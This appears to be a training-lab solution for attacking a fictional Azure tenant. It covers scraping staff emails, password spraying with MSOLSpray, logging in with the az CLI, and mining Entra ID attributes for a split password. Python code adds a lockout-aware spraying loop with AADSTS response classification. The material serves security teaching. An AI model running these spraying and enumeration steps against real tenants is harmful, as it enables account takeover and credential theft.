
BA Lab 04 – Solution

For the purpose of this lab we need to navigate to https://solardropsuserfiles.azurewebsites.net/#team again and collect the email addresses published on the team page. A public staff list like this hands an attacker both the list of targets and the organisation's username format (first name @ tenant).

Full Name       Email Address
Jhon Mickel     Jhon@SolarDrops.onmicrosoft.com
James Arnold    james@SolarDrops.onmicrosoft.com
Lellien Linda   Lellien@SolarDrops.onmicrosoft.com
Powel Jo        powel@SolarDrops.onmicrosoft.com
SolarDrops      solardrops@SolarDrops.onmicrosoft.com
Ken             ken@SolarDrops.onmicrosoft.com
Nick            nick@SolarDrops.onmicrosoft.com
Jack            jack@SolarDrops.onmicrosoft.com

Then we need to save these email addresses to a file, one per line, and run the MSOLSpray tool against it to find valid credentials. Attackers often leverage well-known or easily guessable passwords, such as "password123" or variations of it.

In addition to generic passwords, attackers also try targeted candidates such as the current season plus year ("Winter2022"), local football teams, or the company name, tailored to what is commonly used in the target organisation or industry. The key property of password spraying is that one password is tried against many accounts per round, rather than many passwords against one account: each account sees only a single failed login per round, so the spray stays under the lockout threshold (Entra ID smart lockout) and is far less noisy than a brute-force attempt on one account.

# Load the MSOLSpray module and try one password against every UPN in userlist.txt
Import-Module C:\Users\cbasupport\Desktop\Tools\BreachingAzureTools\MSOLSpray-master\MSOLSpray.ps1
cd C:\Users\cbasupport\Desktop\Tools\BreachingAzureTools\MSOLSpray
Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2022

Output:

[*] There are 5 total users to spray.
[*] Now spraying Microsoft Online.
[*] Current date and time: 04/18/2022 14:22:05
[*] WARNING! The user jhon@SolarDrops.onmicrosoft.com doesn't exist.
[*] SUCCESS! james@SolarDrops.onmicrosoft.com : Winter2022
[*] WARNING! The user Lellien@SolarDrops.onmicrosoft.com doesn't exist.
[*] WARNING! The user powel@SolarDrops.onmicrosoft.com doesn't exist.
[*] SUCCESS! solardrops@SolarDrops.onmicrosoft.com : Winter2022
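The two steps above (harvesting the team page into a user list, then spraying one password across it) are shown below as an added Python example; it is not part of the lab or of MSOLSpray, and it does not touch the network. The `TEAM_PAGE_HTML` excerpt, the `FAKE_TENANT` directory and `fake_authenticate` are constructed stand-ins for the live page and for the Entra ID token endpoint (which MSOLSpray reaches with an OAuth2 password grant). What the example adds over the tool output is the response classification a sprayer relies on: an AADSTS50076 (MFA required) or AADSTS50055 (password expired) reply still proves the password is correct, AADSTS50034 means the account does not exist and can be dropped from later rounds, and AADSTS50053 means smart lockout has been tripped, at which point the run should stop.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List

# Constructed excerpt of the team page; the live page is not fetched here.
TEAM_PAGE_HTML = """
<table id="team">
<tr><th>Full Name</th><th>Email Address</th></tr>
<tr><td>Jhon Mickel</td><td>Jhon@SolarDrops.onmicrosoft.com</td></tr>
<tr><td>James Arnold</td><td>james@SolarDrops.onmicrosoft.com</td></tr>
<tr><td>Lellien Linda</td><td>Lellien@SolarDrops.onmicrosoft.com</td></tr>
<tr><td>SolarDrops</td><td>solardrops@SolarDrops.onmicrosoft.com</td></tr>
<tr><td>James Arnold (listed twice)</td><td>James@SolarDrops.onmicrosoft.com</td></tr>
</table>
"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def extract_userlist(html: str) -> List[str]:
    """Harvest e-mail addresses, lower-case them and drop duplicates (order kept).
    UPNs are case-insensitive, so Jhon@ and jhon@ are the same account."""
    seen: Dict[str, None] = {}
    for addr in EMAIL_RE.findall(html):
        seen.setdefault(addr.lower(), None)
    return list(seen)


# Entra ID error codes returned by the OAuth2 password grant, as sprayers such as
# MSOLSpray interpret them. PASSWORD_OK codes mean the password was accepted even
# though no token was issued.
PASSWORD_OK = {
    "AADSTS50076": "MFA required",
    "AADSTS50079": "MFA enrollment required",
    "AADSTS50158": "blocked by Conditional Access",
    "AADSTS50055": "password expired",
}
OTHER = {
    "AADSTS50126": "invalid_password",   # account exists, wrong password
    "AADSTS50034": "no_such_user",
    "AADSTS50053": "locked",             # smart lockout tripped
    "AADSTS50057": "disabled",
}


@dataclass
class SprayResult:
    user: str
    password: str
    status: str   # success | invalid_password | no_such_user | locked | disabled | unknown
    detail: str


def classify(user: str, password: str, response: dict) -> SprayResult:
    """Map one token-endpoint response (JSON already parsed to a dict) to an outcome."""
    if "access_token" in response:
        return SprayResult(user, password, "success", "token issued")
    desc = response.get("error_description", "")
    m = re.match(r"(AADSTS\d+)", desc)
    code = m.group(1) if m else ""
    if code in PASSWORD_OK:
        return SprayResult(user, password, "success", PASSWORD_OK[code])
    return SprayResult(user, password, OTHER.get(code, "unknown"), desc[:60])


def spray(users: List[str], passwords: List[str],
          authenticate: Callable[[str, str], dict]) -> List[SprayResult]:
    """Each round tries ONE password across all users, so no account accumulates
    more than one failure per round. Non-existent and already-cracked accounts are
    dropped after a round; the run stops as soon as a lockout is observed."""
    out: List[SprayResult] = []
    live = list(users)
    for pw in passwords:
        for u in live:
            out.append(classify(u, pw, authenticate(u, pw)))
        if any(r.status == "locked" and r.password == pw for r in out):
            break   # do not push more accounts over the lockout threshold
        live = [u for u in live
                if not any(r.user == u and r.status in ("no_such_user", "success") for r in out)]
    return out


# Constructed stand-in for the real token endpoint; credentials here are invented.
FAKE_TENANT = {
    "james@solardrops.onmicrosoft.com":      {"password": "Winter2022", "mfa": False},
    "solardrops@solardrops.onmicrosoft.com": {"password": "Winter2022", "mfa": True},
    "lellien@solardrops.onmicrosoft.com":    {"password": "Spring2022", "mfa": False},
}


def fake_authenticate(user: str, password: str) -> dict:
    acct = FAKE_TENANT.get(user.lower())
    if acct is None:
        return {"error": "invalid_grant",
                "error_description": "AADSTS50034: The user account does not exist in the directory."}
    if acct["password"] != password:
        return {"error": "invalid_grant",
                "error_description": "AADSTS50126: Error validating credentials due to invalid username or password."}
    if acct["mfa"]:
        return {"error": "interaction_required",
                "error_description": "AADSTS50076: Multi-factor authentication is required."}
    return {"token_type": "Bearer", "access_token": "eyJ...constructed"}


def run_demo() -> List[SprayResult]:
    users = extract_userlist(TEAM_PAGE_HTML)
    return spray(users, ["Summer2022", "Winter2022"], fake_authenticate)


if __name__ == "__main__":
    for r in run_demo():
        print(f"[{r.status:16}] {r.user} : {r.password} ({r.detail})")
```

Against the constructed tenant the second round reports both james and solardrops as hits for Winter2022, the latter via AADSTS50076 rather than a token, which is exactly the case a naive "did I get a token?" check would miss.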

We found two users who use Winter2022 as their password. Our next step is to authenticate to the tenant with the Azure CLI (az) using one of those credentials and see what an ordinary user is allowed to read.

"az" is the Azure Command-Line Interface (CLI), the cross-platform command-line tool for managing Azure resources and services; it is distinct from the Az PowerShell module, which exposes the same APIs as PowerShell cmdlets. With the az CLI a user can manage resources, deploy Azure Resource Manager (ARM) templates, script repetitive tasks, manage access control with Entra ID and role-based access control (RBAC), and query monitoring and diagnostics data, all from a terminal. Every Azure administrator and DevOps engineer who prefers the command line has it installed, which is also why an attacker holding valid credentials can reach the same APIs with the same tool.

Use the credentials of one of the compromised users and log in with the az CLI:

az login -u "james@SolarDrops.onmicrosoft.com" -p "Winter2022" --allow-no-subscriptions

Output:

c620c085-2058-4f82-9f80-13165b0034ed 'SolarDrops'
[
  {
    "cloudName": "AzureCloud",
    "id": "c620c085-2058-4f82-9f80-13165b0034ed",
    "isDefault": true,
    "name": "N/A(tenant level account)",
    "state": "Enabled",
    "tenantId": "c620c085-2058-4f82-9f80-13165b0034ed",
    "user": {
      "name": "james@SolarDrops.onmicrosoft.com",
      "type": "user"
    }
  }
]

By including the --allow-no-subscriptions flag, you tell az login to proceed even if the account has no Azure subscription. The CLI then records a tenant-level login (the "N/A(tenant level account)" entry in the output above), which is enough for tasks that only need Entra ID access, such as directory enumeration with the az ad commands.

In our case, James has no subscription assigned to his Entra ID account, so without --allow-no-subscriptions the login would report that no subscriptions were found. Note also that az login -u/-p uses the username/password flow, which cannot complete multi-factor authentication: it only works here because no MFA or Conditional Access policy is enforced on this account.

The next step is to start enumerating the Entra ID users:

az ad user list
[
  {
    "accountEnabled": true,
    "companyName": "SolarDrops Comp",
    "displayName": "james",
    "employeeId": null,
    "facsimileTelephoneNumber": null,
    "jobTitle": "Username: localpaul, Password Part 3/3: JYql IP: 10.0.2.5",

Enumerating Entra ID (formerly Azure AD) users is a crucial step in a security assessment: by default any member user can read the profile attributes of every other user in the directory, so anything an administrator stores in those attributes is readable by every compromised account.

In this case we found valuable data in the jobTitle attribute of the james account (a username, the third part of a password and an internal IP address) and, after collecting the remaining parts, the complete password of the user localpaul.
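The attribute search described above, as an added Python example that is not part of the lab and does not call Azure: it takes the JSON that `az ad user list` prints, walks every string attribute of every user (nested values included), flags values that look like credentials or IP addresses, and reassembles "Password Part i/N: value" fragments into the full password. Only the james entry's jobTitle is taken from the lab output; the other two users, the extra attribute values and the fragment values S0l4r and Dr0ps are constructed so the example runs offline, and the assumption that the other password parts use the same "Password Part i/N:" format as the one seen in the lab is just that, an assumption.

```python
import json
import re
from typing import Any, Iterator, List, Optional, Tuple

# Constructed, abridged `az ad user list` output. Only james' jobTitle mirrors
# the lab; the other users and their attribute values are made up.
AZ_AD_USER_LIST = json.loads("""
[
  {"userPrincipalName": "james@SolarDrops.onmicrosoft.com", "displayName": "james",
   "jobTitle": "Username: localpaul, Password Part 3/3: JYql IP: 10.0.2.5",
   "department": null, "officeLocation": null},
  {"userPrincipalName": "solardrops@SolarDrops.onmicrosoft.com", "displayName": "SolarDrops",
   "jobTitle": "Founder", "department": "Password Part 1/3: S0l4r", "officeLocation": "HQ"},
  {"userPrincipalName": "ken@SolarDrops.onmicrosoft.com", "displayName": "Ken",
   "jobTitle": null, "department": "Sales", "officeLocation": "Password Part 2/3: Dr0ps",
   "otherMails": ["ken.backup@example.com"]}
]
""")

# Words that should never appear in a directory attribute value, plus dotted-quad IPs.
KEYWORD_RE = re.compile(
    r"(?i)\b(pass(?:word|wd|phrase)?|pwd|secret|token|api[_-]?key|user(?:name)?|login|creds?)\b")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Fragment format observed in the lab: "Password Part 3/3: JYql".
PART_RE = re.compile(r"(?i)password\s+part\s+(\d+)\s*/\s*(\d+)\s*:\s*(\S+)")


def iter_strings(obj: Any, path: str = "") -> Iterator[Tuple[str, str]]:
    """Yield (json_path, value) for every string inside a nested JSON value,
    so extension attributes and lists such as otherMails are covered too."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            yield from iter_strings(v, f"{path}.{k}" if path else k)
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            yield from iter_strings(v, f"{path}[{i}]")
    elif isinstance(obj, str):
        yield path, obj


def find_sensitive_attributes(users: List[dict]) -> List[Tuple[str, str, str]]:
    """Return (userPrincipalName, attribute path, value) for every suspicious value."""
    hits = []
    for user in users:
        upn = user.get("userPrincipalName", "?")
        for path, value in iter_strings(user):
            if KEYWORD_RE.search(value) or IPV4_RE.search(value):
                hits.append((upn, path, value))
    return hits


def reassemble_password(users: List[dict]) -> Optional[str]:
    """Collect 'Password Part i/N: frag' fragments from any attribute of any user
    and join them in order. Returns None unless all N parts were found."""
    parts = {}
    total = None
    for user in users:
        for _, value in iter_strings(user):
            for idx, n, frag in PART_RE.findall(value):
                parts[int(idx)] = frag
                total = int(n)
    if total is None or set(parts) != set(range(1, total + 1)):
        return None
    return "".join(parts[i] for i in range(1, total + 1))


if __name__ == "__main__":
    for upn, path, value in find_sensitive_attributes(AZ_AD_USER_LIST):
        print(f"{upn:45} {path:16} {value}")
    print("reassembled:", reassemble_password(AZ_AD_USER_LIST))
```

In a real engagement the input would be `az ad user list -o json` saved to a file; scanning every string value rather than only jobTitle matters because the same habit puts secrets in department, officeLocation, streetAddress and extension attributes.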